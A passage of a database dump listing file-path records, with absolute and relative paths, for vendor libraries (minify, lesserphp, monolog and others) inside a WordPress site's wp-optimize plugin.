igestVault.php'),(12715,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/intervention/httpauth/src/config/config.php','wp-content/plugins/wp-optimize/vendor/intervention/httpauth/src/config/config.php'),(12716,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/marcusschwarz/lesserphp/LICENSE','wp-content/plugins/wp-optimize/vendor/marcusschwarz/lesserphp/LICENSE'),(12717,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/marcusschwarz/lesserphp/lessc.inc.php','wp-content/plugins/wp-optimize/vendor/marcusschwarz/lesserphp/lessc.inc.php'),(12718,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/marcusschwarz/lesserphp/lessify.inc.php','wp-content/plugins/wp-optimize/vendor/marcusschwarz/lesserphp/lessify.inc.php'),(12719,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/marcusschwarz/lesserphp/package.sh','wp-content/plugins/wp-optimize/vendor/marcusschwarz/lesserphp/package.sh'),(12720,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/LICENSE','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/LICENSE'),(12721,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/keywords_after.txt','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/keywords_after.txt'),(12722,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/keywords_before.txt','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/keywords_before.txt'),(12723,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/keywords_reserved.txt','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/keywords_reserved.txt'),(12724,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/operators.txt','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/operators.txt'),(12725,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/operators_after.txt','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/operators_after.txt'),(12726,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/operators_before.txt','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/data/js/operators_before.txt'),(12727,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/docker-compose.yml','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/docker-compose.yml'),(12728,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/CSS.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/CSS.php'),(12729,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Exception.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Exception.php'),(12730,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Exceptions/BasicException.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Exceptions/BasicException.php'),(12731,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Exceptions/FileImportException.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Exceptions/FileImportException.php'),(12732,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Exceptions/IOException.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Exceptions/IOException.php'),(12733,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/JS.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/JS.php'),(12734,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Minify.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/minify/src/Minify.php'),(12735,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/path-converter/LICENSE','wp-content/plugins/wp-optimize/vendor/matthiasmullie/path-converter/LICENSE'),(12736,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/path-converter/src/Converter.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/path-converter/src/Converter.php'),(12737,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/path-converter/src/ConverterInterface.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/path-converter/src/ConverterInterface.php'),(12738,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/matthiasmullie/path-converter/src/NoConverter.php','wp-content/plugins/wp-optimize/vendor/matthiasmullie/path-converter/src/NoConverter.php'),(12739,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/LICENSE','wp-content/plugins/wp-optimize/vendor/monolog/monolog/LICENSE'),(12740,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/DateTimeImmutable.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/DateTimeImmutable.php'),(12741,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/ErrorHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/ErrorHandler.php'),(12742,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/ChromePHPFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/ChromePHPFormatter.php'),(12743,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/ElasticaFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/ElasticaFormatter.php'),(12744,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/ElasticsearchFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/ElasticsearchFormatter.php'),(12745,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/FlowdockFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/FlowdockFormatter.php'),(12746,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/FluentdFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/FluentdFormatter.php'),(12747,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/FormatterInterface.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/FormatterInterface.php'),(12748,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/GelfMessageFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/GelfMessageFormatter.php'),(12749,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/HtmlFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/HtmlFormatter.php'),(12750,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/JsonFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/JsonFormatter.php'),(12751,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/LineFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/LineFormatter.php'),(12752,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/LogglyFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/LogglyFormatter.php'),(12753,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/LogmaticFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/LogmaticFormatter.php'),(12754,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/LogstashFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/LogstashFormatter.php'),(12755,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/MongoDBFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/MongoDBFormatter.php'),(12756,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/NormalizerFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/NormalizerFormatter.php'),(12757,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/ScalarFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/ScalarFormatter.php'),(12758,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/WildfireFormatter.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Formatter/WildfireFormatter.php'),(12759,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/AbstractHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/AbstractHandler.php'),(12760,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/AbstractProcessingHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/AbstractProcessingHandler.php'),(12761,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/AbstractSyslogHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/AbstractSyslogHandler.php'),(12762,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/AmqpHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/AmqpHandler.php'),(12763,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/BrowserConsoleHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/BrowserConsoleHandler.php'),(12764,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/BufferHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/BufferHandler.php'),(12765,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ChromePHPHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ChromePHPHandler.php'),(12766,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/CouchDBHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/CouchDBHandler.php'),(12767,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/CubeHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/CubeHandler.php'),(12768,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/Curl/Util.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/Curl/Util.php'),(12769,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/DeduplicationHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/DeduplicationHandler.php'),(12770,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/DoctrineCouchDBHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/DoctrineCouchDBHandler.php'),(12771,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/DynamoDbHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/DynamoDbHandler.php'),(12772,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ElasticaHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ElasticaHandler.php'),(12773,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ElasticsearchHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ElasticsearchHandler.php'),(12774,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ErrorLogHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ErrorLogHandler.php'),(12775,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FallbackGroupHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FallbackGroupHandler.php'),(12776,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FilterHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FilterHandler.php'),(12777,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/ActivationStrategyInterface.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/ActivationStrategyInterface.php'),(12778,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/ChannelLevelActivationStrategy.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/ChannelLevelActivationStrategy.php'),(12779,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/ErrorLevelActivationStrategy.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/ErrorLevelActivationStrategy.php'),(12780,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossedHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossedHandler.php'),(12781,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FirePHPHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FirePHPHandler.php'),(12782,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FleepHookHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FleepHookHandler.php'),(12783,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FlowdockHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FlowdockHandler.php'),(12784,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FormattableHandlerInterface.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FormattableHandlerInterface.php'),(12785,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FormattableHandlerTrait.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/FormattableHandlerTrait.php'),(12786,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/GelfHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/GelfHandler.php'),(12787,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/GroupHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/GroupHandler.php'),(12788,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/Handler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/Handler.php'),(12789,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/HandlerInterface.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/HandlerInterface.php'),(12790,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/HandlerWrapper.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/HandlerWrapper.php'),(12791,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/IFTTTHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/IFTTTHandler.php'),(12792,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/InsightOpsHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/InsightOpsHandler.php'),(12793,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/LogEntriesHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/LogEntriesHandler.php'),(12794,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/LogglyHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/LogglyHandler.php'),(12795,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/LogmaticHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/LogmaticHandler.php'),(12796,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/MailHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/MailHandler.php'),(12797,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/MandrillHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/MandrillHandler.php'),(12798,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/MissingExtensionException.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/MissingExtensionException.php'),(12799,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/MongoDBHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/MongoDBHandler.php'),(12800,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/NativeMailerHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/NativeMailerHandler.php'),(12801,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/NewRelicHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/NewRelicHandler.php'),(12802,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/NoopHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/NoopHandler.php'),(12803,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/NullHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/NullHandler.php'),(12804,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/OverflowHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/OverflowHandler.php'),(12805,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/PHPConsoleHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/PHPConsoleHandler.php'),(12806,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ProcessHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ProcessHandler.php'),(12807,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ProcessableHandlerInterface.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ProcessableHandlerInterface.php'),(12808,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ProcessableHandlerTrait.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ProcessableHandlerTrait.php'),(12809,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/PsrHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/PsrHandler.php'),(12810,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/PushoverHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/PushoverHandler.php'),(12811,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/RedisHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/RedisHandler.php'),(12812,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/RedisPubSubHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/RedisPubSubHandler.php'),(12813,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/RollbarHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/RollbarHandler.php'),(12814,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/RotatingFileHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/RotatingFileHandler.php'),(12815,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SamplingHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SamplingHandler.php'),(12816,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SendGridHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SendGridHandler.php'),(12817,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/Slack/SlackRecord.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/Slack/SlackRecord.php'),(12818,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SlackHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SlackHandler.php'),(12819,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SlackWebhookHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SlackWebhookHandler.php'),(12820,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SocketHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SocketHandler.php'),(12821,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SqsHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SqsHandler.php'),(12822,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/StreamHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/StreamHandler.php'),(12823,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SwiftMailerHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SwiftMailerHandler.php'),(12824,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SyslogHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SyslogHandler.php'),(12825,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SyslogUdp/UdpSocket.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SyslogUdp/UdpSocket.php'),(12826,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SyslogUdpHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/SyslogUdpHandler.php'),(12827,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/TelegramBotHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/TelegramBotHandler.php'),(12828,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/TestHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/TestHandler.php'),(12829,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/WebRequestRecognizerTrait.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/WebRequestRecognizerTrait.php'),(12830,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/WhatFailureGroupHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/WhatFailureGroupHandler.php'),(12831,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ZendMonitorHandler.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Handler/ZendMonitorHandler.php'),(12832,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Logger.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Logger.php'),(12833,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/GitProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/GitProcessor.php'),(12834,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/HostnameProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/HostnameProcessor.php'),(12835,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/IntrospectionProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/IntrospectionProcessor.php'),(12836,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/MemoryPeakUsageProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/MemoryPeakUsageProcessor.php'),(12837,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/MemoryProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/MemoryProcessor.php'),(12838,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/MemoryUsageProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/MemoryUsageProcessor.php'),(12839,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/MercurialProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/MercurialProcessor.php'),(12840,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/ProcessIdProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/ProcessIdProcessor.php'),(12841,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/ProcessorInterface.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/ProcessorInterface.php'),(12842,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/PsrLogMessageProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/PsrLogMessageProcessor.php'),(12843,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/TagProcessor.php','wp-content/plugins/wp-optimize/vendor/monolog/monolog/src/Monolog/Processor/TagProcessor.php'),(12844,'/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/monolo